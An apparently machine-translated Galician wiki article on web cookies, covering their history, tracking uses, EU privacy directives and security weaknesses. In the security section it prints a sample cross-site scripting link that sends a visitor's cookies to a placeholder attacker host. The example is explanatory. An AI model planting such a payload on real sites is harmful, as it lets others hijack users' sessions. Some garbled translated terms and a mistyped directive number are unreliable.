in Definicións, wiki

Cookie de Internet: que é? Definición, orixes, tipos e privacidade

Cal é a función dunha cookie, cal é e cales son os tipos de cookies? 🍪

56.3k Visitas 384 Votes

Cookie de Internet: que é? Definición, orixes, tipos e privacidade
Cookie de Internet: que é? Definición, orixes, tipos e privacidade

Un cookie ou cookie web (Ou galleta, abreviado como testemuña en Quebec) defínese polo protocolo de comunicación HTTP como unha secuencia de información enviada por un servidor HTTP a un cliente HTTP, que este último devolve cada vez que se consulta o mesmo servidor HTTP baixo determinadas condicións.

A cookie é o equivalente a a pequeno ficheiro de texto almacenado no terminal do usuario de Internet. Con máis de 20 anos de existencia, permiten aos desenvolvedores de sitios web almacenar os datos dos usuarios para facilitar a súa navegación e permitir determinadas funcionalidades. As cookies sempre foron máis ou menos controvertidas porque conteñen información persoal residual que pode ser explotada por terceiros.

O servidor web envía como cabeceira HTTP ao navegador web que o devolve sen cambios cada vez que accede ao servidor. Pódese usar unha cookie para unha autenticación, unha sesión (mantemento do estado), e para almacenar información específica sobre o usuario, como as preferencias do sitio ou o contido dunha cesta de compras electrónica. O termo cookie deriva de biscoito máxico, un concepto moi coñecido na informática UNIX, que inspirou a idea e o nome das cookies do navegador. Existen algunhas alternativas ás cookies, cada unha cos seus usos, vantaxes e desvantaxes.

Sendo ficheiros de texto simples, as cookies non son executables. Eles non son nin spyware nin virus, aínda que moitos programas antivirus detectan as cookies dalgúns sitios porque permiten rastrexar aos usuarios cando visitan varios sitios. 

A maioría dos navegadores modernos permiten aos usuarios decidir se acepta ou rexeita as cookies. Os usuarios tamén poden escoller canto tempo se almacenan as cookies. Non obstante, o rexeitamento total das cookies fai que algúns sitios sexan inservibles. Por exemplo, almacena carros da compra ou sitios que requiren iniciar sesión mediante credenciais (nome de usuario e contrasinal).

Índice

Historia

o termo biscoito deriva do termo inglés biscoito máxico, que é un paquete de datos que un programa recibe e devolve sen cambios. As cookies xa se usaban en TI cando Lou Montulli tivo a idea de utilizalos nas comunicacións web en xuño de 1994. Nese momento, era empregado de Netscape Communications, que desenvolvera unha aplicación de comercio electrónico para un cliente. As cookies deron unha solución ao problema da fiabilidade da implementación do carro da compra virtual dunha tenda.

John Giannandrea e Lou Montulli escribiron a primeira especificación de cookies de Netscape ese mesmo ano. Versión 0.9 beta de Mosaic Netscape, publicada o 13 de outubro de 1994, integrada tecnoloxía de cookies (ver publicación). O primeiro uso (non experimental) das cookies foi determinar se os visitantes do sitio web de Netscape visitaran o sitio antes. Montulli presentou unha solicitude de patente para a tecnoloxía de cookies en 1995, e concedeuse a patente estadounidense 5774670. concedido en 1998.

Despois de implementarse en Netscape 0.9 beta en 1994, as cookies integráronse en Internet Explorer 2, lanzado en outubro de 1995.

A introdución de cookies aínda non foi moi coñecida polo público. En particular, as cookies foron aceptadas por defecto na configuración do navegador, e os usuarios non foron informados da súa presenza. Algunhas persoas eran conscientes da existencia de cookies ao redor do primeiro trimestre de 1995, pero o público en xeral só asumiu a súa existencia despois de que o Financial Times publicase un artigo o 12 de febreiro de 1996. Nese mesmo ano, as cookies recibiron moita atención nos medios. por posibles intrusións na privacidade. O tema das cookies foi discutido en dúas consultas da Comisión Federal de Comercio de Estados Unidos en 1996 e 1997.

O desenvolvemento da especificación oficial de cookies xa estaba en marcha. As primeiras discusións sobre a especificación oficial tiveron lugar en abril de 1995 na lista de correo www-talk. Formouse un grupo de traballo especial da IETF. Brian Behlendorf e David Kristol propuxeron dúas propostas alternativas para introducir transaccións estatais en HTTP, respectivamente, pero o grupo, dirixido polo propio Kristol, decidiu utilizar a especificación de Netscape como punto de partida. En febreiro de 1996, o grupo de traballo determinou que as cookies de terceiros eran unha ameaza importante para a privacidade. A especificación producida polo grupo foi finalmente publicada como RFC 2109.

Desde finais de 2014, vemos un banner sobre cookies en moitos sitios. Hai polo menos unha extensión do navegador que permite non se mostra o banner.

Tipos de Cookies e Usos

Xestión de sesións

As cookies pódense utilizar para manter os datos do usuario durante a navegación, pero tamén en varias visitas. As cookies introducíronse para ofrecer un medio de implantación de carros electrónicos da compra, un dispositivo virtual no que o usuario pode acumular os artigos que quere mercar mentres navega polo sitio.

Nestes días, aplicacións como os carros da compra almacenan a lista de elementos nunha base de datos nun servidor, o que é preferible; que gardalos na propia galleta. O servidor web envía unha cookie que contén un ID de sesión único. A continuación, o navegador web devolve este ID de sesión en cada solicitude posterior e os elementos da cesta gárdanse e asócianse con este mesmo ID de sesión único.

O uso frecuente de cookies é útil para iniciar sesión nun sitio usando credenciais. En resumo, o servidor web envía primeiro unha cookie que contén un ID de sesión único. A continuación, os usuarios proporcionan as súas credenciais (normalmente un nome de usuario e un contrasinal). Despois, a aplicación web autentica a sesión e permite ao usuario acceder ao servizo.

personalización

As cookies pódense usar para lembrar información sobre o usuario dun sitio, co fin de mostrarlle contido adecuado no futuro. Por exemplo, un servidor web pode enviar unha cookie que contén o último nome de usuario empregado para iniciar sesión nese sitio web, de xeito que ese nome de usuario se poida preencher en futuras visitas.

Moitos sitios web usan cookies para a personalización en función das preferencias do usuario. Os usuarios seleccionan as súas preferencias nun formulario e envían estas ao servidor. O servidor codifica as preferencias nunha cookie e envíao de novo ao navegador. Posteriormente, cada vez que o usuario accede a unha páxina deste sitio, o navegador devolve a cookie e, polo tanto, a lista de preferencias; o servidor pode entón personalizar a páxina segundo as preferencias do usuario. Por exemplo, o sitio web da Wikipedia permite aos seus usuarios elixir o aspecto do sitio que prefiren. O buscador de Google permite aos seus usuarios (aínda que non estean rexistrados) escoller o número de resultados que queren ver en cada páxina de resultados.

Seguimento

As cookies de seguimento utilízanse para rastrexar os hábitos de navegación dos usuarios de Internet. Isto tamén se pode facer en parte mediante o enderezo IP do ordenador que fai unha solicitude dunha páxina ou mediante a cabeceira HTTP "referente" que o cliente envía con cada solicitude, pero as cookies permiten unha maior precisión. Isto pódese facer como no seguinte exemplo:

  1. Se o usuario chama a unha páxina dun sitio e a solicitude non contén unha cookie, o servidor asume que esta é a primeira páxina que visita o usuario. A continuación, o servidor crea unha cadea aleatoria e envíaa ao navegador xunto coa páxina solicitada.
  2. A partir deste momento, a cookie será enviada automaticamente polo navegador cada vez que se chame a unha nova páxina do sitio. O servidor enviará a páxina como é habitual, pero tamén rexistrará o URL da páxina chamada, a data, a hora da solicitude e a cookie nun ficheiro de rexistro.

Ao mirar o ficheiro de rexistro, é posible ver que páxinas visitou o usuario e en que orde. Por exemplo, se o ficheiro contén algunhas solicitudes realizadas mediante a cookie id=abc, isto pode establecer que todas estas solicitudes procedan do mesmo usuario. O URL solicitado, a data e a hora asociadas ás solicitudes permiten rastrexar a navegación do usuario.

As cookies de terceiros e as balizas web, explicadas a continuación, permiten ademais o seguimento en diferentes sitios. O seguimento dun único sitio úsase xeralmente con fins estatísticos. Pola contra, o seguimento en diferentes sitios utilizando cookies de terceiros é xeralmente utilizado polas empresas de publicidade para producir perfís de usuarios anónimos (que despois se utilizan para determinar que anuncios se deben mostrar ao usuario, así como para enviarlle correos electrónicos correspondentes a estes anuncios: SPAM). ).

As cookies de seguimento supoñen un risco de invasión da privacidade do usuario, pero pódense eliminar facilmente. A maioría dos navegadores modernos inclúen unha opción para eliminar automaticamente as cookies persistentes ao pechar a aplicación.

Cookies de terceiros

As imaxes e outros obxectos contidos nunha páxina web poden residir en servidores diferentes do que aloxa a páxina. Para mostrar a páxina, o navegador descarga todos estes obxectos. A maioría dos sitios web conteñen información de diferentes fontes. Por exemplo, se escribes www.example.com no teu navegador, moitas veces haberá obxectos ou anuncios en parte da páxina que proveñen de fontes diferentes, é dicir, dun dominio diferente ao de www.exemplo.com. As cookies "propiedades" son cookies configuradas polo dominio que aparece na barra de enderezos do navegador. As cookies de terceiros son definidas por un dos obxectos da páxina que procede dun dominio diferente.

Por defecto, navegadores como Mozilla Firefox, Microsoft Internet Explorer e Opera aceptan cookies de terceiros, pero os usuarios poden cambiar a configuración nas opcións do navegador para bloquealas. Non hai risco de seguridade inherente ás cookies de terceiros que permiten a funcionalidade web, pero tamén se utilizan para rastrexar os usuarios. de sitio a sitio.

Ferramentas como Ghostery dispoñibles para todos os navegadores, incluído Google Chrome, poden bloquear os intercambios entre terceiros.

Implementación

Unha posible interacción entre un navegador web e o servidor que aloxa a páxina web. O servidor envía unha cookie ao navegador e este envíaa de volta cando chama a outra páxina.
Unha posible interacción entre un navegador web e o servidor que aloxa a páxina web. O servidor envía unha cookie ao navegador e este envíaa de volta cando chama a outra páxina.

As cookies son pequenas pezas de datos enviadas polo servidor web ao navegador. O navegador devólveas ao servidor sen cambios, introducindo o estado (memoria de eventos pasados) na transacción HTTP sen estado. Sen cookies, cada recuperación dunha páxina web ou dun compoñente dunha páxina web é un evento illado, independentemente doutras solicitudes feitas ao mesmo sitio. Ademais de poder ser configuradas polo servidor web, as cookies tamén se poden configurar mediante linguaxes de scripts como JavaScript, se é compatible e autorizado polo navegador.

A especificación oficial de cookies suxire que os navegadores deberían poder gardar e reenviar un número mínimo de cookies. En concreto, un navegador debería poder almacenar polo menos 300 cookies de catro kilobytes cada unha, e polo menos 20 cookies para un único servidor ou dominio.

Segundo o artigo 3.1 do RFC 2965, os nomes das cookies non distinguen entre maiúsculas e minúsculas.

Unha cookie pode especificar a data da súa caducidade, nese caso a cookie eliminarase nesta data. Se a cookie non especifica unha data de caducidade, a cookie elimínase tan pronto como o usuario abandona o seu navegador. Polo tanto, especificar unha data de caducidade é unha forma de facer que a cookie sobreviva durante varias sesións. Por este motivo, dise que as cookies con data de caducidade son persistente. Un exemplo de aplicación: un sitio de venda polo miúdo pode usar cookies persistentes para rexistrar os elementos que os usuarios colocaron no seu carro da compra (en realidade, a cookie pode referirse a unha entrada gardada nunha base de datos do sitio de venda, e non no seu ordenador) . A través deste medio, se os usuarios abandonan o seu navegador sen realizar unha compra e volven a el máis tarde, poderán volver atopar os artigos no carro. Se estas cookies non indicasen unha data de caducidade, caducarían ao pechar o navegador e perderíase a información sobre o contido da cesta.

As cookies poden limitarse en alcance a un dominio, subdominio ou ruta específicos do servidor que as creou.

A transferencia de páxinas web realízase mediante o protocolo HTTP (HyperText Transfer Protocol). Ao ignorar as cookies, os navegadores chaman a unha páxina desde os servidores web enviándolles xeralmente un breve texto chamado Solicitude HTTP. Por exemplo, para acceder á páxina www.example.org/index.html, os navegadores conéctanse ao servidor www.example.org e envían unha solicitude así:

GET /index.html HTTP/1.1Host: www.example.org
navegadorservidor

O servidor responde enviando a páxina solicitada, precedida dun texto semellante, chamando a toda Resposta HTTP. Este paquete pode conter liñas que indican ao navegador que almacene cookies:

HTTP/1.1 200 OKContent-type: text/htmlSet-Cookie: name=value
(Páxina HTML)
navegadorservidor

O servidor só envía a liña Set-Cookie, se o servidor quere que o navegador almacene unha cookie. Set-Cookie é unha solicitude para que o navegador almacene a cadea nome=valor e a devolva en todas as solicitudes futuras ao servidor. Se o navegador admite cookies e as cookies están habilitadas nas opcións do navegador, a cookie incluirase en todas as solicitudes posteriores realizadas ao mesmo servidor. Por exemplo, o navegador chama á páxina www.example.org/news.html enviando a seguinte solicitude ao servidor www.example.org:

GET /news.html HTTP/1.1Host: www.example.orgCookie: nome=valorAceptar: */*
navegadorservidor

Esta é unha solicitude para outra páxina do mesmo servidor, e difire da primeira anterior porque contén unha cadea que o servidor enviou previamente ao navegador. Grazas a este medio, o servidor sabe que esta solicitude está ligada á anterior. O servidor responde enviando a páxina chamada, e tamén engadindo outras cookies.

O servidor pode cambiar o valor da cookie enviando unha nova liña Set-Cookie: name=new_value en resposta á páxina chamada. A continuación, o navegador substitúe o valor antigo polo novo.

A liña Set-Cookie adoita ser creada por un programa CGI ou outra linguaxe de script, non polo servidor HTTP. O servidor HTTP (exemplo: Apache) só transmitirá o resultado do programa (un documento precedido pola cabeceira que contén as cookies) ao navegador.

As cookies tamén se poden configurar mediante JavaScript ou outros idiomas similares que se executan no navegador, é dicir, no lado do cliente e non no do servidor. En JavaScript, o obxecto document.cookie úsase para este fin. Por exemplo, a instrución document.cookie = "temperature=20" crea unha cookie chamada "temperature" e cun valor de 20.

Exemplo dunha resposta HTTP de google.com, que establece unha cookie con atributos.
Exemplo dunha resposta HTTP de google.com, que establece unha cookie con atributos.

Ademais do par nome/valor, unha cookie tamén pode conter unha data de caducidade, un camiño, un nome de dominio e o tipo de conexión que se pretende, é dicir, normal ou cifrada. O RFC 2965 tamén define que as cookies deben ter un número de versión obrigatorio, pero normalmente omítese. Estas partes de datos seguen o par nome=novo_valor e están separadas por punto e coma. Por exemplo, o servidor pode crear unha cookie enviando unha liña Set-Cookie: name=new_value; caduca=data; ruta=/; dominio=.example.org.

As cookies caducan e logo non son enviadas polo navegador ao servidor nas seguintes situacións:

  • Cando o navegador está pechado, se a cookie non é persistente.
  • Cando transcorra a data de caducidade da cookie.
  • Cando se cambia a data de caducidade da cookie (polo servidor ou polo script) a unha data do pasado.
  • Cando o navegador elimina a cookie a petición do usuario.

A terceira situación permite que os servidores ou scripts eliminen explícitamente unha cookie. Teña en conta que é posible co navegador web Google Chrome coñecer a data de caducidade dunha determinada cookie accedendo á configuración de contido. Unha cookie gardada nun ordenador pode permanecer alí durante varias décadas se non se realiza ningún procedemento para borrala.

Estereotipos

Desde a súa introdución en Internet, moitas ideas sobre as cookies circularon por Internet e nos medios de comunicación. En 1998, o CIAC, un equipo de seguimento de incidentes informáticos do Departamento de Enerxía dos Estados Unidos, determinou que as vulnerabilidades de seguridade das cookies eran "esencialmente inexistentes" e explicou que "a información sobre a orixe das súas visitas e os detalles das páxinas web que visitou. xa existen nos ficheiros de rexistro dos servidores web”. En 2005, Jupiter Research publicou os resultados dun estudo, no que unha porcentaxe significativa dos entrevistados consideraba as seguintes afirmacións:

  • As cookies son como virus, infectan os discos duros dos usuarios.
  • Xeran cookies emerxente.
  • As cookies úsanse para enviar spam.
  • As cookies úsanse só para publicidade.

As cookies non poden borrar nin ler información do ordenador do usuario. Non obstante, as cookies permiten detectar as páxinas web visitadas por un usuario nun determinado sitio ou conxunto de sitios. Esta información pódese recoller nun perfil de usuario que se pode utilizar ou revender a terceiros, o que pode supoñer serios problemas de privacidade. Algúns perfís son anónimos, no sentido de que non conteñen información persoal, aínda que mesmo tales perfís poden ser cuestionables.

Segundo o mesmo estudo, unha gran porcentaxe de internautas non sabe como eliminar as cookies. Unha das razóns polas que a xente non confía nas cookies é que algúns sitios abusaron do aspecto de identificación persoal das cookies e compartiron esta información con outras fontes. Unha gran porcentaxe da publicidade dirixida e do correo electrónico non solicitado, considerado spam, procede da información obtida das cookies de seguimento.

Configuración do navegador

A maioría dos navegadores admiten cookies e permiten ao usuario desactivalas. As opcións máis comúns son:

  • Activa ou desactiva as cookies por completo, para que sexan aceptadas ou bloqueadas constantemente.
  • Permitirlle ao usuario ver as cookies activas nunha determinada páxina, introducindo javascript: alert(document.cookie) na barra de enderezos do navegador. Algúns navegadores incorporan un xestor de cookies para o usuario que pode ver e eliminar selectivamente as cookies almacenadas actualmente polo navegador.

A maioría dos navegadores tamén permiten a eliminación total de datos persoais que inclúen cookies. Tamén existen módulos adicionais para controlar os permisos das cookies.

Privacidade e cookies de terceiros

Neste exemplo ficticio, unha empresa de publicidade colocou banners en dous sitios web. Ao aloxar os banners nos seus servidores e utilizar cookies de terceiros, a empresa publicitaria é capaz de rastrexar a navegación do usuario por estes dous sitios.

As cookies teñen importantes implicacións para a privacidade e o anonimato dos usuarios da web. Aínda que as cookies só se envían de volta ao servidor que as configura ou a un servidor pertencente ao mesmo dominio de Internet, unha páxina web pode conter imaxes ou outros compoñentes almacenados en servidores pertencentes a outros dominios. As cookies que se establecen durante a recuperación destes compoñentes externos chámanse cookies de terceiros. Isto inclúe cookies de ventás emerxentes non desexadas.

As empresas de publicidade usan cookies de terceiros para rastrexar aos usuarios nos diferentes sitios que visitan. En particular, unha empresa de publicidade pode rastrexar un usuario en todas as páxinas onde colocou imaxes publicitarias ou un píxel de seguimento. O coñecemento das páxinas visitadas polo usuario permite á empresa publicitaria orientarse ás preferencias publicitarias do usuario.

Algúns considera que a capacidade de crear un perfil de usuario é unha invasión da privacidade, especialmente cando o seguimento se realiza en diferentes dominios mediante cookies de terceiros. Por este motivo, algúns países teñen lexislación sobre cookies.

O goberno dos Estados Unidos implementou regras estritas sobre a colocación de cookies en 2000, despois de que se revelase que a Oficina de Política de Drogas da Casa Branca estaba a usar cookies para rastrexar os ordenadores dos usuarios que ven anuncios de medicamentos en liña. En 2002, o activista de privacidade Daniel Brandt descubriu que a CIA deixaba cookies persistentes nos ordenadores que visitaran os seus sitios web. Unha vez informada deste incumprimento, a CIA declarou que estas cookies non se enviaron intencionadamente e deixou de configuralas. O 25 de decembro de 2005, Brandt descubriu que a Axencia de Seguridade Nacional (NSA) deixara dúas cookies persistentes nos ordenadores dos visitantes por mor dunha actualización de software. Despois de ser notificado, a NSA desactivou inmediatamente as cookies.

No Reino Unido, o Lei de cookies “, entrado en vigor o 25 de maio de 2012, obriga aos sitios a declarar as súas intencións, permitindo así aos usuarios escoller se queren deixar pegadas ou non do seu paso en Internet. Pódense así protexer da orientación publicitaria. Non obstante, dacordo con The Guardian, o consentimento dos usuarios de Internet non é necesariamente explícito; realizáronse cambios nos termos do consentimento do usuario, facéndoo así implicado.

Directiva 2002/58 sobre privacidade

A Directiva 202/58 de privacidade e comunicacións electrónicas, contén normas sobre o uso de cookies. En particular, o artigo 5, parágrafo 3 desta directiva esixe que o almacenamento de datos (como as cookies) no ordenador do usuario só se poida realizar se:

  • infórmase ao usuario de como se utilizan os datos;
  • o usuario ten a opción de rexeitar esta operación de almacenamento. Non obstante, este artigo tamén establece que o almacenamento de datos por razóns técnicas está exento desta lei.

No entanto, que debía aplicarse a partir de outubro de 2003, a directiva só se puxo en práctica de forma moi imperfecta segundo un informe de decembro de 2004, no que tamén se sinalaba que certos Estados membros (Eslovaquia, Letonia, Grecia, Bélxica e Luxemburgo) aínda non transpoñeran a normativa. directiva ao dereito interno.

Segundo o ditame do G29 en 2010, esta directiva, que condiciona especialmente o uso de cookies con fins de publicidade comportamental, sobre o consentimento explícito do internauta segue moi mal aplicada. De feito, a maioría dos sitios fano dun xeito que non se axusta á directiva, limitándose a un simple "banner" informando do uso de "cookies" sen dar información sobre os usos, sen diferenciar cookies "técnicas". cookies de "seguimento", nin para ofrecer unha opción real ao usuario que desexe manter cookies técnicas (como as cookies de xestión da cesta da compra) e rexeitar as cookies de "seguimento". De feito, moitos sitios non funcionan correctamente se se rexeitan as cookies, o que non cumpre coa directiva 2002/58 ou coa directiva 95/46 (Protección de datos persoais).

Directiva 2009/136 / CE

Este material foi actualizado pola Directiva 2009/136/CE do 25 de novembro de 2009 que establece que "o almacenamento de información, ou a obtención de acceso a información xa almacenada, no equipo terminal dun abonado ou usuario só está permitido a condición de que o abonado ou usuario deu o seu consentimento, despois de ter recibido, en cumprimento da Directiva 95/46/CE, información clara e completa, entre outros, sobre os fins do tratamento”. A nova directiva reforza, polo tanto, as obrigas previas á colocación de cookies no ordenador do internauta.

No entanto, nas consideracións preliminares da directiva, o lexislador europeo especifica: "Cando sexa técnicamente posible e eficaz, de conformidade coas disposicións pertinentes da Directiva 95/46/CE, o consentimento do usuario respecto do tratamento poderá expresarse mediante o uso da configuración adecuada dun navegador ou doutra aplicación”. Pero, de feito, ningún navegador permite disociar ata o momento as cookies técnicas esenciais das opcionais que deben deixarse ​​á elección do usuario.

Esta nova directiva foi transposta polos deputados belgas en xullo de 2012. Un estudo de 2014 mostra que ata os deputados teñen dificultades para aplicar as limitacións da directiva.

P3P

A especificación P3P inclúe a posibilidade de que un servidor estableza unha política de privacidade, que define que tipo de información recompila e con que propósito. Estas políticas inclúen (pero non se limitan a) o uso da información recollida mediante cookies. Segundo as definicións de P3P, un navegador pode aceptar ou rexeitar cookies comparando as políticas de privacidade coas preferencias do usuario ou preguntándolle ao usuario, presentando a declaración de privacidade da política de privacidade declarada polo servidor.

Moitos navegadores, incluíndo Apple Safari e Microsoft Internet Explorer versións 6 e 7, admiten P3P, o ​​que permite que o navegador determine se acepta o almacenamento de cookies de terceiros. O navegador Opera permite aos usuarios rexeitar as cookies de terceiros e crear un perfil de seguridade global e específico para os dominios de Internet. A versión 2 de Mozilla Firefox abandonou o soporte P3P pero reinstalouno na versión 3.

A maioría dos navegadores poden bloquear as cookies de terceiros para aumentar a privacidade e reducir o seguimento de anuncios, sen afectar negativamente á experiencia web do usuario. Moitas axencias de publicidade ofrecen unha opción deshabilitar á publicidade dirixida, mediante a configuración dunha cookie xenérica no navegador que desactiva esta orientación, pero tal solución non resulta prácticamente efectiva, cando se respecta, porque esta cookie xenérica borrase en canto o usuario elimina estas cookies o que anula a opción decisión fóra.

Desvantaxes das cookies

Ademais dos problemas de privacidade, as cookies tamén teñen algúns inconvenientes técnicos. En particular, non sempre identifican con precisión aos usuarios, poden ralentizar o rendemento do sitio cando son grandes, poden usarse para ataques de seguridade e entran en conflito coa transferencia estatal representativa, o estilo arquitectónico do software.

Identificación imprecisa

Se se utiliza máis dun navegador nun ordenador, en cada un deles sempre hai unha unidade de almacenamento separada para as cookies. Polo tanto, as cookies non identifican a unha persoa, senón a combinación dunha conta de usuario, un ordenador e un navegador web. Así, calquera pode utilizar estas contas, ordenadores ou navegadores que teñen a panoplia de cookies. Do mesmo xeito, as cookies non diferencian entre varios usuarios que comparten a mesma conta de usuario, ordenador e navegador, como en "cibercafés" ou en calquera lugar que dea acceso gratuíto aos recursos informáticos.

Pero na práctica esta afirmación resulta ser falaz na maioría dos casos porque hoxe en día un ordenador "persoal" (ou un teléfono intelixente, ou unha tableta, o que é peor) é usado principalmente por un só individuo, o que supón apuntar a unha persoa concreta e a través do volume de información recollida chegan a unha orientación personalizada aínda que a persoa non estea identificada "nomeadamente".

Unha cookie pode ser roubada por outro ordenador da rede.

Durante o funcionamento normal, as cookies son enviadas de novo entre o servidor (ou un grupo de servidores do mesmo dominio) e o navegador do ordenador do usuario. Dado que as cookies poden conter información sensible (nome de usuario, contrasinal empregado para a autenticación, etc.), os seus valores non deberían ser accesibles para outros ordenadores. O roubo de cookies é un acto de interceptación de cookies por parte dun terceiro non autorizado.

As cookies pódense roubar mediante un detector de paquetes nun ataque chamado secuestro de sesión. O tráfico na rede pode ser interceptado e lido por ordenadores distintos dos que envían e reciben (especialmente no espazo Wi-Fi público sen cifrar). Este tráfico inclúe cookies enviadas durante sesións mediante o protocolo HTTP simple. Cando o tráfico da rede non está cifrado, os usuarios malintencionados poden así ler as comunicacións doutros usuarios na rede mediante "sniffers de paquetes".

Este problema pódese superar cifrando a conexión entre o ordenador do usuario e o servidor mediante o protocolo HTTPS. Un servidor pode especificar a bandeira segura ao configurar unha cookie; o navegador só o enviará a través dunha liña segura, como unha conexión SSL.

Non obstante, moitos sitios, aínda que utilizan comunicación cifrada HTTPS para a autenticación do usuario (é dicir, a páxina de inicio de sesión), despois envían cookies de sesión e outros datos de forma normal, a través de conexións HTTP sen cifrar por razóns de eficiencia. Así, os atacantes poden interceptar as cookies doutros usuarios e suplantar a identidade delas en sitios apropiados ou utilizalas en ataques de cookies.

Scripting no sitio: unha cookie que só debe intercambiarse entre o servidor e o cliente envíase a outro terceiro.

Outra forma de roubar cookies é crear scripts de sitios e facer que o propio navegador envíe cookies a servidores maliciosos que nunca as reciben. Os navegadores modernos permiten a execución de partes de código buscadas dende o servidor. Se se accede ás cookies durante o tempo de execución, os seus valores poden ser comunicados dalgunha forma a servidores que non deberían acceder a elas. Cifrar as cookies antes de enviarlas pola rede non axuda a frustrar o ataque.

Este tipo de scripts no sitio adoitan ser empregados polos atacantes en sitios que permiten aos usuarios publicar contido HTML. Ao integrar unha parte de código compatible na contribución HTML, un atacante pode recibir cookies doutros usuarios. O coñecemento destas cookies pódese utilizar conectándose ao mesmo sitio utilizando as cookies roubadas, sendo así recoñecido como o usuario cuxas cookies foron roubadas.

Unha forma de evitar este tipo de ataques é utilizar a marca HttpOnly; é unha opción, introducida dende a versión 6 de Internet Explorer en PHP dende a versión 5.2.0 que está pensada para facer que a cookie sexa inaccesible para o cliente próximo ao script. Non obstante, os desenvolvedores web deben telo en conta no desenvolvemento do seu sitio para que sexan inmunes aos scripts no sitio.

Outra ameaza de seguridade utilizada é a fabricación de demanda no sitio.

A especificación técnica oficial permite que as cookies se devolvan só aos servidores do dominio do que se orixinaron. Non obstante, o valor das cookies pódese enviar a outros servidores mediante outros medios que non sexan as cabeceiras das cookies.

En particular, as linguaxes de script como JavaScript teñen permiso xeral para acceder aos valores de cookies e poden enviar valores arbitrarios a calquera servidor de Internet. Esta capacidade de script úsase desde sitios web que permiten aos usuarios publicar contido HTML para que outros usuarios o vexan.

Por exemplo, un atacante que opera no dominio example.com pode publicar un comentario que conteña a seguinte ligazón que apunta a un blog popular que doutro xeito non controla:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Cando outro usuario fai clic nesta ligazón, o navegador executa a parte do código do atributo onclick, polo que substitúe a cadea document.cookie pola lista de cookies de usuario que están activas para esta páxina. Polo tanto, esta lista de cookies envíase ao servidor example.com e, polo tanto, o atacante pode recoller as cookies deste usuario.

Este tipo de ataque é difícil de detectar no lado do usuario porque o script procede do mesmo dominio que estableceu a cookie, e a operación para enviar os valores parece estar autorizada por ese dominio. Considérase que é responsabilidade dos administradores que operan este tipo de sitios poñer en marcha restricións que impidan a publicación de códigos maliciosos.

As cookies non son directamente visibles para programas do cliente como JavaScript se foron enviadas coa marca HttpOnly. Desde o punto de vista do servidor, a única diferenza é que na liña da cabeceira Set-Cookie engádese un novo campo que contén a cadea HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Cando o navegador recibe unha cookie deste tipo, suponse que a utilizará normalmente no seguinte intercambio HTTP, pero sen facelo visible para os scripts executados no lado do cliente. A marca HttpOnly non forma parte de ningunha especificación técnica oficial e non está implementada en todos os navegadores. Teña en conta que actualmente non hai forma de evitar a lectura e escritura de cookies de sesión polo método XMLHTTPRequest.

Modificación do contido: un atacante envía unha cookie non válida a un servidor, posiblemente feita a partir dunha cookie válida enviada polo servidor.

Tan pronto como as cookies teñan que ser almacenadas e devoltas sen cambios ao servidor, un atacante pode modificar o valor das cookies antes de que sexan enviadas de novo ao servidor. Por exemplo, se unha cookie contén o valor total que o usuario ten que pagar polos artigos colocados no carro da compra da tenda, o cambio deste valor expón ao servidor o risco de cobrar ao atacante menos que o prezo inicial. Chámase o proceso de modificación do valor das cookies intoxicación por galletas e pódese usar despois do roubo de cookies para que o ataque sea persistente.

No método de anulación de cookies, o atacante explota unha falla do navegador para enviar unha cookie non válida ao servidor.

Non obstante, a maioría dos sitios web só almacenan un ID de sesión (un número único xerado aleatoriamente que se usa para identificar o usuario da sesión) na propia cookie, mentres que toda a outra información se almacena no servidor. Neste caso, este problema está resolto en gran medida.

Espérase que cada sitio teña as súas propias cookies, polo que un sitio non debería poder modificar nin crear cookies asociadas a outro. Unha falla de seguranza do navegador web pode permitir que sitios maliciosos incumpran esta regra. A explotación de tal fallo denomínase comunmente como cociña entre sitios. O propósito de tales ataques pode ser o roubo de identificación da sesión.

Os usuarios deben utilizar as últimas versións dos navegadores web nas que estas vulnerabilidades están practicamente eliminadas.

Estado conflitivo entre cliente e servidor

O uso de cookies pode xerar unha contradición entre o estado do cliente e o estado almacenado na cookie. Se o usuario adquire unha cookie e fai clic no botón "Atrás" do navegador, o estado do navegador xeralmente non é o mesmo que antes desta adquisición. Por exemplo, se a cesta dunha tenda en liña se crea mediante cookies, o contido da cesta non pode cambiar cando o usuario volve ao historial do navegador: se o usuario preme un botón para engadir un artigo na súa cesta e fai clic no botón "Volver". ", o artigo permanece neste. Esta pode non ser a intención do usuario, que certamente quere cancelar a adición do artigo. Isto pode levar a falta de fiabilidade, confusión e erros. Polo tanto, os desenvolvedores web deberían ser conscientes deste problema e implementar medidas para xestionar situacións coma esta.

Os expertos en seguridade da privacidade criticaron as cookies persistentes por non estar configuradas para caducar o suficientemente pronto, polo que os sitios web poden rastrexar os usuarios e construír o seu perfil ao longo do tempo. Este aspecto das cookies tamén forma parte do problema do secuestro de sesión, porque unha cookie persistente roubada pode usarse para suplantar a identidade dun usuario durante un período de tempo considerable.

Ler tamén: GAFAM: quen son? Por que dan (ás veces) tanto medo?

Alternativas ás cookies

Algunhas operacións que se poden realizar mediante cookies tamén se poden realizar mediante outros mecanismos que evitan as cookies ou recrean as cookies eliminadas, o que crea problemas de privacidade da mesma forma (ou ás veces peor porque logo son invisibles) que as cookies.

Dirección IP

Pódese rastrexar aos usuarios co enderezo IP do ordenador que chama á páxina. Esta técnica está dispoñible desde a introdución da World Wide Web, a medida que se descargan as páxinas o servidor solicita o enderezo IP do ordenador que executa o navegador ou o proxy, se non se utiliza ningún. O servidor pode rastrexar esta información se hai ou non cookies en uso. Non obstante, estes enderezos adoitan ser menos fiables á hora de identificar a un usuario que as cookies porque os ordenadores e os proxies poden ser compartidos por varios usuarios e o mesmo ordenador pode recibir un enderezo IP diferente en cada sesión de traballo (como é o caso das conexións telefónicas). .

O seguimento por enderezos IP pode ser fiable nalgunhas situacións, como conexións de banda ancha que manteñen o mesmo enderezo IP durante moito tempo, sempre que estea acendido.

Algúns sistemas como Tor están deseñados para manter o anonimato de Internet e facer que o seguimento por enderezo IP sexa imposible ou pouco práctico.

URL

Unha técnica máis precisa baséase na incorporación de información nos URL. A parte da cadea de consulta do URL é unha técnica que se usa normalmente para este propósito, pero tamén se poden usar outras partes. Tanto o servidor de Java como os mecanismos de sesión PHP usan este método se as cookies non están habilitadas.

